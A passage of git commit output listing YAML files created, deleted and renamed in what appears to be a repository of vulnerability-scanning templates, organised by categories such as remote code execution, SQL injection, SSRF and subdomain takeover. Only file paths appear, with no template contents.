thinkphp-5022-rce-10747.yaml} (100%) delete mode 100644 poc/php/thinkphp-5023-rce-10748.yaml delete mode 100644 poc/php/thinkphp-509-information-disclosure-10755.yaml create mode 100644 poc/php/twig-php-ssti-10856.yaml delete mode 100644 poc/php/wp-phpfreechat-xss-11524.yaml create mode 100644 poc/python/autobahn-python-detect-594.yaml delete mode 100644 poc/python/autobahn-python-detect-595.yaml create mode 100644 poc/python/django-admin-panel-7023.yaml create mode 100644 poc/python/django-debug-exposed-404.yaml delete mode 100644 poc/python/django-framework-exceptions.yaml delete mode 100644 poc/python/django-secret-key.yaml create mode 100644 poc/python/django-secret.key.yaml delete mode 100644 poc/python/jupyter-ipython-unauth-8402.yaml delete mode 100644 poc/python/python-metrics.yaml create mode 100644 poc/python/python-scanner-9748.yaml delete mode 100644 poc/python/python-scanner.yaml delete mode 100644 poc/rabbitmq/rabbitmq-dashboard-9776.yaml create mode 100644 poc/rabbitmq/rabbitmq-dashboard-9779.yaml create mode 100644 poc/rabbitmq/rabbitmq-default-admin-9780.yaml delete mode 100644 poc/rabbitmq/rabbitmq-default-admin-9782.yaml create mode 100644 poc/redis/exposed-redis-7339.yaml delete mode 100644 poc/remote_code_execution/apache-flink-unauth-rce-355.yaml delete mode 100644 poc/remote_code_execution/apache-httpd-rce-362.yaml create mode 100644 poc/remote_code_execution/apache-solr-log4j-rce-372.yaml delete mode 100644 poc/remote_code_execution/cisco-cloudcenter-suite-log4j-rce.yaml create mode 100644 poc/remote_code_execution/cisco-cloudcenter-suite-rce.yaml rename poc/remote_code_execution/{code42-log4j-rce-1131.yaml => code42-log4j-rce.yaml} (100%) rename poc/remote_code_execution/{core-chuangtian-cloud-rce-1207.yaml => core-chuangtian-cloud-rce-1211.yaml} (100%) delete mode 100644 poc/remote_code_execution/elex-woocommerce-xss-7199.yaml create mode 100644 poc/remote_code_execution/elex-woocommerce-xss.yaml create mode 100644 poc/remote_code_execution/eyou-email-rce-7380.yaml create mode 100644 poc/remote_code_execution/eyou-email-rce-7382.yaml delete mode 100644 poc/remote_code_execution/fastjson-1-2-24-rce.yaml create mode 100644 poc/remote_code_execution/fastjson-1-2-41-rce.yaml rename poc/remote_code_execution/{fastjson-1-2-42-rce.yaml => fastjson-1-2-42-rce-7408.yaml} (100%) create mode 100644 poc/remote_code_execution/fastjson-1-2-43-rce-7412.yaml create mode 100644 poc/remote_code_execution/fastjson-1-2-62-rce-7419.yaml delete mode 100644 poc/remote_code_execution/icewarp-webclient-rce-8133.yaml create mode 100644 poc/remote_code_execution/jamf-log4j-jndi-rce-8214.yaml delete mode 100644 poc/remote_code_execution/jamf-log4j-jndi-rce.yaml delete mode 100644 poc/remote_code_execution/lotuscms-rce-8650.yaml create mode 100644 poc/remote_code_execution/lotuscms-rce-8652.yaml create mode 100644 poc/remote_code_execution/metersphere-plugin-rce.yaml delete mode 100644 poc/remote_code_execution/mirai-unknown-rce-8899.yaml delete mode 100644 poc/remote_code_execution/nuuo-nvrmini2-rce-9170.yaml create mode 100644 poc/remote_code_execution/optilink-ont1gew-gpon-rce-9343.yaml create mode 100644 poc/remote_code_execution/panabit-sy_addmount-rce.yaml create mode 100644 poc/remote_code_execution/pdf-signer-ssti-to-rce-9470.yaml delete mode 100644 poc/remote_code_execution/pdf-signer-ssti-to-rce-9472.yaml rename poc/remote_code_execution/{phalcon-framework-source.yaml => phalcon-framework-source-9494.yaml} (100%) delete mode 100644 poc/remote_code_execution/phalcon-framework-source-9496.yaml rename poc/remote_code_execution/{php-zerodium-backdoor-rce-9569.yaml => php-zerodium-backdoor-rce-9572.yaml} (100%) delete mode 100644 poc/remote_code_execution/php-zerodium-backdoor-rce.yaml create mode 100644 poc/remote_code_execution/powercreator-cms-rce-9645.yaml create mode 100644 poc/remote_code_execution/powercreator-cms-rce.yaml create mode 100644 poc/remote_code_execution/qi-anxin-netkang-next-generation-firewall-rce-9758.yaml create mode 100644 poc/remote_code_execution/qi-anxin-netkang-next-generation-firewall-rce-9761.yaml delete mode 100644 poc/remote_code_execution/salesforce-aura.yaml create mode 100644 poc/remote_code_execution/sangfor-ba-rce-10020.yaml create mode 100644 poc/remote_code_execution/seacms-rce-10101.yaml create mode 100644 poc/remote_code_execution/showdoc-file-upload-rce-10227.yaml create mode 100644 poc/remote_code_execution/simple-employee-rce-10279.yaml delete mode 100644 poc/remote_code_execution/simple-employee-rce-10280.yaml rename poc/remote_code_execution/{spon-ip-rce.yaml => spon-ip-rce(1).yaml} (100%) create mode 100644 poc/remote_code_execution/sponip-network-system-ping-rce-10421.yaml rename poc/remote_code_execution/{springboot-h2-db-rce-10457.yaml => springboot-h2-db-rce.yaml} (100%) delete mode 100644 poc/remote_code_execution/tamronos-rce-10649.yaml delete mode 100644 poc/remote_code_execution/thinkphp-2-rce-10740.yaml delete mode 100644 poc/remote_code_execution/thinkphp-501-rce-10743.yaml create mode 100644 poc/remote_code_execution/thinkphp-501-rce.yaml create mode 100644 poc/remote_code_execution/thinkphp-5022-rce-10744.yaml rename poc/remote_code_execution/{thinkphp-5022-rce.yaml => thinkphp-5022-rce-10747.yaml} (100%) delete mode 100644 poc/remote_code_execution/thinkphp-5023-rce-10748.yaml create mode 100644 poc/remote_code_execution/vercel-takeover-11000.yaml delete mode 100644 poc/remote_code_execution/vercel-takeover-11001.yaml create mode 100644 poc/remote_code_execution/vmware-horizon-log4j-jndi-rce.yaml delete mode 100644 poc/remote_code_execution/webui-rce-11170.yaml create mode 100644 poc/remote_code_execution/webui-rce-11174.yaml delete mode 100644 poc/remote_code_execution/wordpress-woocommerce-listing-11339.yaml create mode 100644 poc/remote_code_execution/wordpress-woocommerce-listing-11341.yaml delete mode 100644 poc/remote_code_execution/wordpress-woocommerce-sqli-11345.yaml create mode 100644 poc/remote_code_execution/wp-force-ssl.yaml create mode 100644 poc/remote_code_execution/wp-woocommerce-file-download-11620.yaml delete mode 100644 poc/remote_code_execution/wp-woocommerce-file-download.yaml create mode 100644 poc/remote_code_execution/yapi-rce-11725.yaml create mode 100644 poc/ruby/rails-debug-mode-9806.yaml delete mode 100644 poc/ruby/rails-debug-mode-9807.yaml delete mode 100644 poc/ruby/rails-secret-token-disclosure-9809.yaml create mode 100644 poc/ruby/rails-secret-token-disclosure-9810.yaml delete mode 100644 poc/samba/samba-config-9987.yaml create mode 100644 poc/samba/samba-config.yaml delete mode 100644 poc/sap/sap-netweaver-detect-10047.yaml create mode 100644 poc/sap/sap-netweaver-info-leak-10051.yaml delete mode 100644 poc/sap/sap-netweaver-info-leak-10052.yaml delete mode 100644 poc/sap/sap-netweaver-webgui.yaml delete mode 100644 poc/sap/sap-recon-detect-10063.yaml delete mode 100644 poc/sap/sap-redirect.yaml create mode 100644 poc/sap/sap-web-dispatcher-admin-portal-10071.yaml create mode 100644 poc/sap/sapfiori-panel-10033.yaml delete mode 100644 poc/sap/sapfiori-panel-10034.yaml create mode 100644 poc/search/aws-opensearch-login-649.yaml delete mode 100644 poc/search/aws-opensearch-login-650.yaml create mode 100644 poc/search/elasticsearch-sql-client-detect-7190.yaml delete mode 100644 poc/search/searches.yaml delete mode 100644 poc/sensitive/sensitive-storage-exposure.yaml delete mode 100644 poc/sensitive/zenphoto-installation-sensitive-info.yaml create mode 100644 poc/sensitive/zenphoto-sensitive-info-11784.yaml delete mode 100644 poc/sharepoint/exposed-sharepoint-list-7345.yaml create mode 100644 poc/shopify/shopify-custom-token(1).yaml delete mode 100644 poc/shopify/shopify-custom-token-10198.yaml delete mode 100644 poc/shopify/shopify-private-token-11861.yaml delete mode 100644 poc/shopify/shopify-takeover-10201.yaml create mode 100644 poc/smtp/easy-wp-smtp-listing-7156.yaml delete mode 100644 poc/smtp/easy-wp-smtp-listing-7157.yaml create mode 100644 poc/smtp/msmtp-config-8967.yaml create mode 100644 poc/social/flow-flow-social-stream-xss-7524.yaml delete mode 100644 poc/social/flow-flow-social-stream-xss.yaml delete mode 100644 poc/social/linkedin-id-11853.yaml create mode 100644 poc/social/sassy-social-share-10083.yaml rename poc/social/{sassy-social-share-10087.yaml => sassy-social-share.yaml} (100%) rename poc/sql/{74cms-sqli-10.yaml => 74cms-sqli.yaml} (100%) rename poc/sql/{android-debug-database-exposed-316.yaml => android-debug-database-exposed-314.yaml} (100%) rename poc/sql/{api-abuseipdb-384.yaml => api-abuseipdb-385.yaml} (100%) create mode 100644 poc/sql/api-abuseipdb.yaml create mode 100644 poc/sql/buildbot-panel-803.yaml delete mode 100644 poc/sql/chamilo-lms-sqli-892.yaml create mode 100644 poc/sql/chamilo-lms-sqli.yaml create mode 100644 poc/sql/chanjet-crm-sqli.yaml create mode 100644 poc/sql/couchdb-adminparty-1237.yaml delete mode 100644 poc/sql/couchdb-exposure-1238.yaml create mode 100644 poc/sql/couchdb-exposure-1239.yaml delete mode 100644 poc/sql/db-backup-lfi-6774.yaml create mode 100644 poc/sql/db-backup-lfi-6775.yaml create mode 100644 poc/sql/db-schema-6783.yaml delete mode 100644 poc/sql/dbeaver-credentials-6780.yaml rename poc/sql/{dedecms-membergroup-sqli.yaml => dedecms-membergroup-sqli-6796.yaml} (100%) delete mode 100644 poc/sql/dotnetcms-sqli.yaml create mode 100644 poc/sql/duomicms-sql-injection-7124.yaml create mode 100644 poc/sql/duomicms-sql-injection.yaml create mode 100644 poc/sql/ecology-syncuserinfo-sqli.yaml create mode 100644 poc/sql/elasticsearch-sql-client-detect-7190.yaml create mode 100644 poc/sql/etouch-v2-sqli-7266.yaml create mode 100644 poc/sql/exposed-adb-7282.yaml create mode 100644 poc/sql/glpi-9.3.3-sql-injection.yaml delete mode 100644 poc/sql/kevinlab-bems-sqli-8457.yaml create mode 100644 poc/sql/mdb-database-file-8795.yaml delete mode 100644 poc/sql/mdb-database-file-8796.yaml create mode 100644 poc/sql/mongodb-detect-8920.yaml delete mode 100644 poc/sql/mongodb-unauth-8925.yaml create mode 100644 poc/sql/odoo-database-manager-9204.yaml delete mode 100644 poc/sql/odoo-database-manager-9205.yaml delete mode 100644 poc/sql/openerp-database-9275.yaml create mode 100644 poc/sql/openerp-database-9277.yaml delete mode 100644 poc/sql/oracle-dbass-detect-9351.yaml delete mode 100644 poc/sql/oracle-dbass-detect.yaml delete mode 100644 poc/sql/oracle-ebs-sqllog-disclosure-9369.yaml create mode 100644 poc/sql/pbootcms-database-file-download-9469.yaml delete mode 100644 poc/sql/phpmyadmin-sql-9534.yaml create mode 100644 poc/sql/pikpikcusqli.yaml create mode 100644 poc/sql/quick-cms-sqli.yaml create mode 100644 poc/sql/seacms-sqli-10103.yaml rename poc/sql/{springboot-h2-db-rce-10457.yaml => springboot-h2-db-rce.yaml} (100%) delete mode 100644 poc/sql/sql-server-reporting-10509.yaml delete mode 100644 poc/sql/sqli_header-10504.yaml create mode 100644 poc/sql/suspicious-sql-error-messages.yaml delete mode 100644 poc/sql/symfony-database-config-10616.yaml rename poc/sql/{symfony-database-config.yaml => symfony-database-config-10617.yaml} (100%) rename poc/sql/{thumbs-db-disclosure.yaml => thumbs-db-disclosure-10763.yaml} (100%) create mode 100644 poc/sql/tidb-unauth-10770.yaml delete mode 100644 poc/sql/tidb-unauth-10772.yaml create mode 100644 poc/sql/ucmdb-default-login-10871.yaml rename poc/sql/{ucmdb-default-login-10869.yaml => ucmdb-default-login.yaml} (100%) create mode 100644 poc/sql/unauthenticated-influxdb-10903.yaml create mode 100644 poc/sql/wordpress-db-repair-11252.yaml delete mode 100644 poc/sql/wordpress-woocommerce-sqli-11345.yaml delete mode 100644 poc/sql/xdcms-sqli-11664.yaml create mode 100644 poc/sql/yongyou-jdbcread.yaml delete mode 100644 poc/sql/zcms-v3-sqli-11773.yaml rename poc/sql_injection/{74cms-sqli-10.yaml => 74cms-sqli.yaml} (100%) delete mode 100644 poc/sql_injection/chamilo-lms-sqli-892.yaml create mode 100644 poc/sql_injection/chamilo-lms-sqli.yaml create mode 100644 poc/sql_injection/chanjet-crm-sqli.yaml rename poc/sql_injection/{dedecms-membergroup-sqli.yaml => dedecms-membergroup-sqli-6796.yaml} (100%) delete mode 100644 poc/sql_injection/dotnetcms-sqli.yaml create mode 100644 poc/sql_injection/ecology-syncuserinfo-sqli.yaml create mode 100644 poc/sql_injection/etouch-v2-sqli-7266.yaml delete mode 100644 poc/sql_injection/kevinlab-bems-sqli-8457.yaml create mode 100644 poc/sql_injection/quick-cms-sqli.yaml create mode 100644 poc/sql_injection/seacms-sqli-10103.yaml create mode 100644 poc/sql_injection/sqli.yaml delete mode 100644 poc/sql_injection/sqli_header-10504.yaml delete mode 100644 poc/sql_injection/wordpress-woocommerce-sqli-11345.yaml delete mode 100644 poc/sql_injection/xdcms-sqli-11664.yaml delete mode 100644 poc/sql_injection/zcms-v3-sqli-11773.yaml create mode 100644 poc/ssrf/cloudflare-image-ssrf-1021.yaml create mode 100644 poc/ssrf/confluence-ssrf-sharelinks-1192.yaml delete mode 100644 poc/ssrf/confluence-ssrf-sharelinks-1193.yaml create mode 100644 poc/ssrf/hasura-graphql-ssrf-7905.yaml delete mode 100644 poc/ssrf/openbmcs-ssrf-9261.yaml create mode 100644 poc/ssrf/openbmcs-ssrf.yaml delete mode 100644 poc/ssrf/umbraco-base-ssrf.yaml rename poc/ssrf/{w3c-total-cache-ssrf-11080.yaml => w3c-total-cache-ssrf-11077.yaml} (100%) create mode 100644 poc/ssrf/wp-multiple-theme-ssrf-11513.yaml delete mode 100644 poc/ssrf/yongyou-ssrf-11745.yaml create mode 100644 poc/ssrf/zimbra-preauth-ssrf.yaml create mode 100644 poc/subdomain_takeover/aftership-takeover-205.yaml create mode 100644 poc/subdomain_takeover/agilecrm-takeover-208.yaml create mode 100644 poc/subdomain_takeover/aha-takeover-216.yaml rename poc/subdomain_takeover/{airee-takeover-228.yaml => airee-takeover-226.yaml} (100%) delete mode 100644 poc/subdomain_takeover/anima-takeover-318.yaml create mode 100644 poc/subdomain_takeover/anima-takeover-319.yaml delete mode 100644 poc/subdomain_takeover/bigcartel-takeover-727.yaml create mode 100644 poc/subdomain_takeover/bigcartel-takeover-728.yaml create mode 100644 poc/subdomain_takeover/bitbucket-takeover-738.yaml delete mode 100644 poc/subdomain_takeover/bitbucket-takeover-740.yaml create mode 100644 poc/subdomain_takeover/brightcove-takeover-783.yaml create mode 100644 poc/subdomain_takeover/brightcove-takeover-784.yaml delete mode 100644 poc/subdomain_takeover/brightcove-takeover-785.yaml rename poc/subdomain_takeover/{canny-takeover-857.yaml => canny-takeover-854.yaml} (100%) create mode 100644 poc/subdomain_takeover/cargo-takeover-867.yaml delete mode 100644 poc/subdomain_takeover/cargo-takeover-868.yaml delete mode 100644 poc/subdomain_takeover/cargocollective-takeover-862.yaml create mode 100644 poc/subdomain_takeover/cargocollective-takeover-863.yaml create mode 100644 poc/subdomain_takeover/elasticbeantalk-takeover-7188.yaml create mode 100644 poc/subdomain_takeover/flexbe-takeover-7505.yaml create mode 100644 poc/subdomain_takeover/flywheel-takeover-7525.yaml delete mode 100644 poc/subdomain_takeover/freshdesk-takeover-7540.yaml create mode 100644 poc/subdomain_takeover/freshdesk-takeover-7541.yaml create mode 100644 poc/subdomain_takeover/frontify-takeover-7542.yaml create mode 100644 poc/subdomain_takeover/gemfury-takeover-7578.yaml delete mode 100644 poc/subdomain_takeover/getresponse-takeover-7607.yaml create mode 100644 poc/subdomain_takeover/getresponse-takeover-7609.yaml create mode 100644 poc/subdomain_takeover/ghost-takeover-7619.yaml delete mode 100644 poc/subdomain_takeover/ghost-takeover-7621.yaml create mode 100644 poc/subdomain_takeover/gitbook-takeover-7627.yaml create mode 100644 poc/subdomain_takeover/hatenablog-takeover-7907.yaml delete mode 100644 poc/subdomain_takeover/helpjuice-takeover-7925.yaml create mode 100644 poc/subdomain_takeover/helpjuice-takeover-7926.yaml create mode 100644 poc/subdomain_takeover/helprace-takeover-7930.yaml delete mode 100644 poc/subdomain_takeover/helprace-takeover-7932.yaml create mode 100644 poc/subdomain_takeover/helpscout-takeover-7936.yaml delete mode 100644 poc/subdomain_takeover/heroku-takeover-7944.yaml create mode 100644 poc/subdomain_takeover/intercom-takeover-8166.yaml delete mode 100644 poc/subdomain_takeover/intercom-takeover-8167.yaml create mode 100644 poc/subdomain_takeover/jazzhr-takeover-8235.yaml create mode 100644 poc/subdomain_takeover/jetbrains-takeover-8292.yaml delete mode 100644 poc/subdomain_takeover/kinsta-takeover-8495.yaml create mode 100644 poc/subdomain_takeover/landingi-takeover-8566.yaml delete mode 100644 poc/subdomain_takeover/landingi-takeover-8567.yaml delete mode 100644 poc/subdomain_takeover/launchrock-takeover-8602.yaml delete mode 100644 poc/subdomain_takeover/launchrock-takeover-8605.yaml delete mode 100644 poc/subdomain_takeover/ngrok-takeover-9126.yaml create mode 100644 poc/subdomain_takeover/ngrok-takeover-9128.yaml delete mode 100644 poc/subdomain_takeover/pantheon-takeover-9459.yaml delete mode 100644 poc/subdomain_takeover/pingdom-takeover-9584.yaml create mode 100644 poc/subdomain_takeover/pingdom-takeover-9586.yaml delete mode 100644 poc/subdomain_takeover/proposify-takeover-9695.yaml create mode 100644 poc/subdomain_takeover/proposify-takeover-9696.yaml create mode 100644 poc/subdomain_takeover/readme-takeover-9842.yaml delete mode 100644 poc/subdomain_takeover/readthedocs-takeover-9844.yaml create mode 100644 poc/subdomain_takeover/readthedocs-takeover-9846.yaml delete mode 100644 poc/subdomain_takeover/s3-subtakeover-9968.yaml create mode 100644 poc/subdomain_takeover/s3-subtakeover-9969.yaml delete mode 100644 poc/subdomain_takeover/shopify-takeover-10201.yaml delete mode 100644 poc/subdomain_takeover/simplebooklet-takeover-10272.yaml create mode 100644 poc/subdomain_takeover/simplebooklet-takeover-10274.yaml rename poc/subdomain_takeover/{smartjob-takeover-10324.yaml => smartjob-takeover-10322.yaml} (100%) rename poc/subdomain_takeover/{smartling-takeover-10326.yaml => smartling-takeover-10327.yaml} (100%) delete mode 100644 poc/subdomain_takeover/smugmug-takeover-10338.yaml create mode 100644 poc/subdomain_takeover/smugmug-takeover-10339.yaml create mode 100644 poc/subdomain_takeover/strikingly-takeover-10551.yaml delete mode 100644 poc/subdomain_takeover/surge-takeover-10578.yaml create mode 100644 poc/subdomain_takeover/tave-takeover-10660.yaml delete mode 100644 poc/subdomain_takeover/tave-takeover-10662.yaml rename poc/subdomain_takeover/{teamwork-takeover-10670.yaml => teamwork-takeover-10668.yaml} (100%) create mode 100644 poc/subdomain_takeover/tictail-takeover-10766.yaml delete mode 100644 poc/subdomain_takeover/tictail-takeover-10767.yaml rename poc/subdomain_takeover/{tilda-takeover-10781.yaml => tilda-takeover-10783.yaml} (100%) create mode 100644 poc/subdomain_takeover/tumblr-takeover-10845.yaml delete mode 100644 poc/subdomain_takeover/tumblr-takeover-10847.yaml rename poc/subdomain_takeover/{unbounce-takeover-10971.yaml => unbounce-takeover-10970.yaml} (100%) rename poc/subdomain_takeover/{uptimerobot-takeover-10989.yaml => uptimerobot-takeover-10987.yaml} (100%) delete mode 100644 poc/subdomain_takeover/vend-takeover-10996.yaml create mode 100644 poc/subdomain_takeover/vend-takeover-10998.yaml create mode 100644 poc/subdomain_takeover/vercel-takeover-11000.yaml delete mode 100644 poc/subdomain_takeover/vercel-takeover-11001.yaml delete mode 100644 poc/subdomain_takeover/webflow-takeover-11131.yaml create mode 100644 poc/subdomain_takeover/webflow-takeover-11133.yaml create mode 100644 poc/subdomain_takeover/wishpond-takeover-11216.yaml delete mode 100644 poc/subdomain_takeover/wishpond-takeover-11217.yaml create mode 100644 poc/subdomain_takeover/wordpress-takeover-11312.yaml delete mode 100644 poc/subdomain_takeover/wordpress-takeover-11313.yaml create mode 100644 poc/subdomain_takeover/wufoo-takeover-11648.yaml delete mode 100644 poc/subdomain_takeover/wufoo-takeover-11649.yaml delete mode 100644 poc/subdomain_takeover/zendesk-takeover-11780.yaml create mode 100644 poc/subdomain_takeover/zendesk-takeover-11781.yaml create mode 100644 poc/template_injection/pdf-signer-ssti-to-rce-9470.yaml delete mode 100644 poc/template_injection/pdf-signer-ssti-to-rce-9472.yaml create mode 100644 poc/template_injection/pikpikcussti.yaml create mode 100644 poc/template_injection/twig-php-ssti-10856.yaml delete mode 100644 poc/upload/exposed-jquery-file-upload.yaml rename poc/upload/{oa-v9-uploads-file-9190.yaml => oa-v9-uploads-file-9191.yaml} (100%) rename poc/upload/{oa-v9-uploads-file-9189.yaml => oa-v9-uploads-file.yaml} (100%) create mode 100644 poc/upload/showdoc-file-upload-rce-10227.yaml create mode 100644 poc/upload/unauthenticated-popup-upload-10921.yaml rename poc/upload/{unauthenticated-popup-upload-10922.yaml => unauthenticated-popup-upload.yaml} (100%) rename poc/vmware/{vmware-horizon-11041.yaml => vmware-horizon-11040.yaml} (100%) create mode 100644 poc/vmware/vmware-horizon-log4j-jndi-rce.yaml delete mode 100644 poc/vmware/vmware-vcenter-lfi-11047.yaml create mode 100644 poc/vmware/vmware-vcenter-lfi.yaml rename poc/vmware/{vmware-vrealize-detect-11057.yaml => vmware-vrealize-detect.yaml} (100%) rename poc/vmware/{vmware-workflow-11059.yaml => vmware-workflow-11060.yaml} (100%) create mode 100644 poc/vmware/vmware-workflow.yaml delete mode 100644 poc/web/alphaweb-default-login.yaml delete mode 100644 poc/web/artica-web-proxy-detect-545.yaml rename poc/web/{artica-web-proxy-detect-543.yaml => artica-web-proxy-detect.yaml} (100%) delete mode 100644 poc/web/axigen-webadmin-660.yaml delete mode 100644 poc/web/axigen-webmail.yaml delete mode 100644 poc/web/azkaban-web-client-676.yaml create mode 100644 poc/web/azkaban-web-client-680.yaml create mode 100644 poc/web/boa-web-fileread-11846.yaml create mode 100644 poc/web/boa-web-server.yaml create mode 100644 poc/web/cobbler-webgui-1123.yaml delete mode 100644 poc/web/cobbler-webgui-1124.yaml create mode 100644 poc/web/codemeter-webadmin-panel-1135.yaml delete mode 100644 poc/web/codemeter-webadmin-panel-1138.yaml create mode 100644 poc/web/exposed-webalizer-7358.yaml delete mode 100644 poc/web/exposed-webalizer-7360.yaml create mode 100644 poc/web/hashicorp-consul-webgui-7896.yaml delete mode 100644 poc/web/honeywell-web-controller-7996.yaml delete mode 100644 poc/web/icewarp-webclient-rce-8133.yaml create mode 100644 poc/web/icinga-web-login-8134.yaml delete mode 100644 poc/web/icinga-web-login-8137.yaml delete mode 100644 poc/web/iplanet-web-server-8190.yaml create mode 100644 poc/web/iplanet-web-server-8191.yaml create mode 100644 poc/web/keenetic-web-login-8442.yaml delete mode 100644 poc/web/keenetic-web-login-8443.yaml create mode 100644 poc/web/oracle-iplanet-web-server-9392.yaml delete mode 100644 poc/web/oracle-iplanet-web-server.yaml create mode 100644 poc/web/saia-web-server-info.yaml delete mode 100644 poc/web/sap-netweaver-webgui.yaml create mode 100644 poc/web/sap-web-dispatcher-admin-portal-10071.yaml create mode 100644 poc/web/slack-webhook(1).yaml delete mode 100644 poc/web/slack-webhook-11865.yaml create mode 100644 poc/web/spark-webui-unauth-10401.yaml delete mode 100644 poc/web/web-config-11125.yaml delete mode 100644 poc/web/web-ftp-detect-11136.yaml create mode 100644 poc/web/web-local-craft-11139.yaml delete mode 100644 poc/web/web-local-craft-11141.yaml create mode 100644 poc/web/web-suite-detect-11168.yaml delete mode 100644 poc/web/web-suite-detect.yaml delete mode 100644 poc/web/webcamxp-5-11122.yaml create mode 100644 poc/web/webcamxp-5.yaml delete mode 100644 poc/web/webeditors-11129.yaml delete mode 100644 poc/web/webflow-takeover-11131.yaml create mode 100644 poc/web/webflow-takeover-11133.yaml rename poc/web/{weblogic-t3-detect-11152.yaml => weblogic-t3-detect-11153.yaml} (100%) delete mode 100644 poc/web/weblogic-weak-login-11154.yaml create mode 100644 poc/web/webmodule-ee-11162.yaml delete mode 100644 poc/web/webmodule-ee-11164.yaml rename poc/web/{webmodule-ee-panel-11160.yaml => webmodule-ee-panel-11161.yaml} (100%) delete mode 100644 poc/web/webui-rce-11170.yaml create mode 100644 poc/web/webui-rce-11174.yaml rename poc/web/{webview-addjavascript-interface-11177.yaml => webview-addjavascript-interface-11176.yaml} (100%) create mode 100644 poc/web/webview-load-url-11180.yaml delete mode 100644 poc/web/webview-load-url-11182.yaml delete mode 100644 poc/web/xp-webcam.yaml delete mode 100644 poc/wordpress/alfacgiapi-wordpress.yaml create mode 100644 poc/wordpress/easy-wp-smtp-listing-7156.yaml delete mode 100644 poc/wordpress/easy-wp-smtp-listing-7157.yaml create mode 100644 poc/wordpress/feedwordpress-xss-7459.yaml delete mode 100644 poc/wordpress/nativechurch-wp-theme-lfd-9001.yaml delete mode 100644 poc/wordpress/trilithic-viewpoint-default-10835.yaml delete mode 100644 poc/wordpress/viewpoint-system-status-11019.yaml delete mode 100644 poc/wordpress/wordpress-accessible-wpconfig-11235.yaml delete mode 100644 poc/wordpress/wordpress-affiliatewp-log-11240.yaml create mode 100644 poc/wordpress/wordpress-affiliatewp-log-11242.yaml create mode 100644 poc/wordpress/wordpress-bbpress-plugin-listing.yaml create mode 100644 poc/wordpress/wordpress-db-repair-11252.yaml rename poc/wordpress/{wordpress-debug-log-11258.yaml => wordpress-debug-log-11259.yaml} (100%) rename poc/wordpress/{wordpress-detect-11261.yaml => wordpress-detect-11260.yaml} (100%) delete mode 100644 poc/wordpress/wordpress-emergency-script-11272.yaml create mode 100644 poc/wordpress/wordpress-emergency-script-11275.yaml delete mode 100644 poc/wordpress/wordpress-git-config-11278.yaml delete mode 100644 poc/wordpress/wordpress-gotmls-detect-11280.yaml rename poc/wordpress/{wordpress-gtranslate-plugin-listing-11284.yaml => wordpress-gtranslate-plugin-listing-11282.yaml} (100%) delete mode 100644 poc/wordpress/wordpress-gtranslate-plugin-listing.yaml delete mode 100644 poc/wordpress/wordpress-infinitewp-auth-bypass-11288.yaml rename poc/wordpress/{wordpress-installer-log-11290.yaml => wordpress-installer-log-11292.yaml} (100%) delete mode 100644 poc/wordpress/wordpress-lfi.yaml delete mode 100644 poc/wordpress/wordpress-redirection-plugin-listing-11306.yaml rename poc/wordpress/{wordpress-redirection-plugin-listing.yaml => wordpress-redirection-plugin-listing-11308.yaml} (100%) create mode 100644 poc/wordpress/wordpress-takeover-11312.yaml delete mode 100644 poc/wordpress/wordpress-takeover-11313.yaml create mode 100644 poc/wordpress/wordpress-themes-detect-11316.yaml rename poc/wordpress/{wordpress-total-upkeep-backup-download-11322.yaml => wordpress-total-upkeep-backup-download-11324.yaml} (100%) create mode 100644 poc/wordpress/wordpress-weak-credentials-11336.yaml delete mode 100644 poc/wordpress/wordpress-weak-credentials-11337.yaml delete mode 100644 poc/wordpress/wordpress-woocommerce-listing-11339.yaml create mode 100644 poc/wordpress/wordpress-woocommerce-listing-11341.yaml delete mode 100644 poc/wordpress/wordpress-woocommerce-sqli-11345.yaml delete mode 100644 poc/wordpress/wordpress-woosidebars.yaml create mode 100644 poc/wordpress/wordpress-wordfence-lfi-11346.yaml delete mode 100644 poc/wordpress/wordpress-wordfence-lfi-11350.yaml delete mode 100644 poc/wordpress/wordpress-wordfence-waf-bypass-xss-11356.yaml delete mode 100644 poc/wordpress/wordpress-workflow-11363.yaml create mode 100644 poc/wordpress/wordpress-workflow-11365.yaml create mode 100644 poc/wordpress/wordpress-wpcourses-info-disclosure-11369.yaml delete mode 100644 poc/wordpress/wordpress-wpcourses-info-disclosure-11371.yaml delete mode 100644 poc/wordpress/wordpress-xmlrpc-listmethods-11372.yaml rename poc/wordpress/{wordpress-xmlrpc-listmethods.yaml => wordpress-xmlrpc-listmethods-11374.yaml} (100%) delete mode 100644 poc/wordpress/wordpress-zebra-form-xss-11378.yaml create mode 100644 poc/wordpress/wordpress-zebra-form-xss-11379.yaml create mode 100644 poc/wordpress/wordpress.yaml create mode 100644 poc/wordpress/wp-ambience-xss-11407.yaml create mode 100644 poc/wordpress/wp-arforms-listing-11415.yaml rename poc/wordpress/{wp-code-snippets-xss-11425.yaml => wp-code-snippets-xss.yaml} (100%) create mode 100644 poc/wordpress/wp-custom-tables-xss-11433.yaml delete mode 100644 poc/wordpress/wp-custom-tables-xss-11434.yaml mode change 100755 => 100644 poc/wordpress/wp-debug-log.yaml delete mode 100644 poc/wordpress/wp-email-subscribers-listing.yaml delete mode 100644 poc/wordpress/wp-finder-xss-11445.yaml create mode 100644 poc/wordpress/wp-force-ssl.yaml create mode 100644 poc/wordpress/wp-full-path-disclosure-11455.yaml delete mode 100644 poc/wordpress/wp-full-path-disclosure-11457.yaml create mode 100644 poc/wordpress/wp-grimag-open-redirect-11458.yaml rename poc/wordpress/{wp-gtranslate-open-redirect.yaml => wp-gtranslate-open-redirect-11463.yaml} (100%) delete mode 100644 poc/wordpress/wp-gtranslate-open-redirect-11465.yaml rename poc/wordpress/{wp-install-11475.yaml => wp-install-11473.yaml} (100%) create mode 100644 poc/wordpress/wp-install.yaml create mode 100644 poc/wordpress/wp-javospot-lfi-11482.yaml delete mode 100644 poc/wordpress/wp-javospot-lfi.yaml delete mode 100644 poc/wordpress/wp-knews-xss-11487.yaml create mode 100644 poc/wordpress/wp-knews-xss-11488.yaml create mode 100644 poc/wordpress/wp-memphis-documents-library-lfi-11495.yaml create mode 100644 poc/wordpress/wp-mstore-plugin-listing-11500.yaml create mode 100644 poc/wordpress/wp-multiple-theme-ssrf-11513.yaml delete mode 100644 poc/wordpress/wp-phpfreechat-xss-11524.yaml create mode 100644 poc/wordpress/wp-plugin-1-flashgallery-listing-11530.yaml rename poc/wordpress/{wp-plugin-1-flashgallery-listing-11531.yaml => wp-plugin-1-flashgallery-listing.yaml} (100%) rename poc/wordpress/{wp-plugin-utlimate-member.yaml => wp-plugin-utlimate-member-11542.yaml} (100%) rename poc/wordpress/{wp-popup-listing.yaml => wp-popup-listing-11543.yaml} (100%) 